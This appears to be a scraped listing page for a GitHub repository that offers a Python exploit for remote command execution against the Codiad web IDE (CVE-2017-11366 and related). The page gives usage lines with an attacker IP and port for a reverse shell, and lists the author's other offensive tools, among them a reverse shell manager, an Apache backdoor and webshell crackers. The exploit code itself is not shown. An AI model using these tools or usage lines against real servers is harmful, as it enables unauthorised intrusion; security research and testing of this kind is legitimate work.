WangYihang/Codiad-Remote-Code-Execute-Exploit

Stars
64
Rank 479,282 (Top 10 %)
Language
Python
Created over 7 years ago
Updated over 6 years ago

WangYihang/Codiad-Remote-Code-Execute-Exploit

WangYihang

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

A simple exploit to execute system command on codiad

Codiad-Remote-Code-Execute-Exploit

Description

A simple exploit to execute system command on Codiad This tool will exploit the vuln Codiad application to get a reverse shell

CVE

CVE-2017-11366
CVE-2017-15689
CVE-2018-14009 (0 Day exploitation)

Effected Version

<=2.8.4 (latest version)

Effected Environment

Windows
Linux

Usage :

Usage : 
        python exploit.py [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
        python exploit.py [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
Example : 
        python exploit.py http://localhost/ admin admin 8.8.8.8 8888 linux
        python exploit.py http://localhost:8080/ admin admin 8.8.8.8 8888 windows
Author : 
        WangYihang <[email protected]>

Example videos

Example GIFs

Windows

Linux

Acknowledgement

@mhaskar (Give suggestions for Windows platform exploitation)

Platypus

🔨 A modern multiple reverse shell sessions manager written in go

GitHacker

🕷️ A `.git` folder exploiting tool that is able to restore the entire Git repository, including stash, common branches and common tags.

Webshell-Sniper

🔨 Manage your website via terminal

SourceLeakHacker

🐛 A multi threads web application source leak scanner

ccupp

基于社会工程学的弱口令密码字典生成工具

UsbKeyboardDataHacker

USB键盘流量包取证工具 , 用于恢复用户的击键信息

Reverse-Shell-Manager

🔨 A multiple reverse shell session/client manager via terminal

USB-Mouse-Pcap-Visualizer

USB mouse traffic packet forensic tool, mainly used to draw mouse movements and dragging trajectories

Exploit-Framework

🔥 An Exploit framework for Web Vulnerabilities written in Python

Apache-HTTP-Server-Module-Backdoor

👺 A Simple Backdoor For Apache HTTP Server

MIT-6.031-Readings-zh-cn

麻省理工大学-18年春季学期-软件构造(6.031)课程阅读中文版

awesome-web-security

📓 Some notes and impressive articles of Web Security

Find-PHP-Vulnerabilities

🐛 A plug-in of sublime 2/3 which is able to find PHP vulnerabilities

PwnMe

二进制渗透题目汇总

IdiomsSolitaire

sqli-labs

WriteUp of sqli-labs (GitBook : https://www.gitbook.com/book/wangyihang/sqli-labs/details)

12306

12306网站抢票Python脚本

WebShellCracker

WebShell密码爆破工具

LinuxShellScript

LinuxShell编程笔记

SQL-Hacker

简单SQL注入工具

XorShellcode

Shellcode异或加密工具

Subdomain-Crawler

A program for collecting subdomains of a list of given second-level domains (SLD)

ShellcodeSpider

Shellcode Spider of Exploit-DB

HIT-Courses-Calendar

哈尔滨工业大学教务处课表Excel转换iCal脚本

gojob

Go(od) Job is a simple job scheduler that supports task retries, logging, and task sharding.

Proxy-Verifier

A set of tools designed to efficiently and effectively locate publicly available proxy server resources.

PPT-Generator

Generate PPT via a simple summary

tplayer

一个Linux终端播放器 , 使用字符绘制图片/视频 , 并按照帧率播放

Presentations

t3sec-network-flow-analysis

acw-sc-v2.js

`acw_sc__v2` cookie generator

Docker-Container-Exposer

Expose docker containers to public network

pickle-pickle

A arbitary python code executer via python pickle

CrackMe

Platypus-Python

SimpleEncrypter

简单shellcode加密工具(存在 0 字节)

Markdown-URL-to-Title

DBLP-Spider

A spider tool for downloading the DBLP search results into local BibTeX files.

MovieSearcher

电影资源搜索工具

Image-LSB-Stego

http-grab

tranco-go-package

acw-sc-v2-py

Python requests.HTTPAdapter for `acw_sc__v2`

dns-grab

PrintableShellcodeCreator

可打印shellcode生成工具

DBAPPSecurity-Unified-Security-Management-Python-Connector

Python Connector for DBAPPSecurity Unified Security Management | 明御®运维审计与风险控制系统（堡垒机）

bgphenet

acw-sc-v2-go

ModifyHeadersForChrome

ModifyHeadersForChrome

ProcessInjector

JBrowserWithPulgins

Java实现的一个简单的Web浏览器 , 提供了插件功能 , 目前插件有下载地址分析器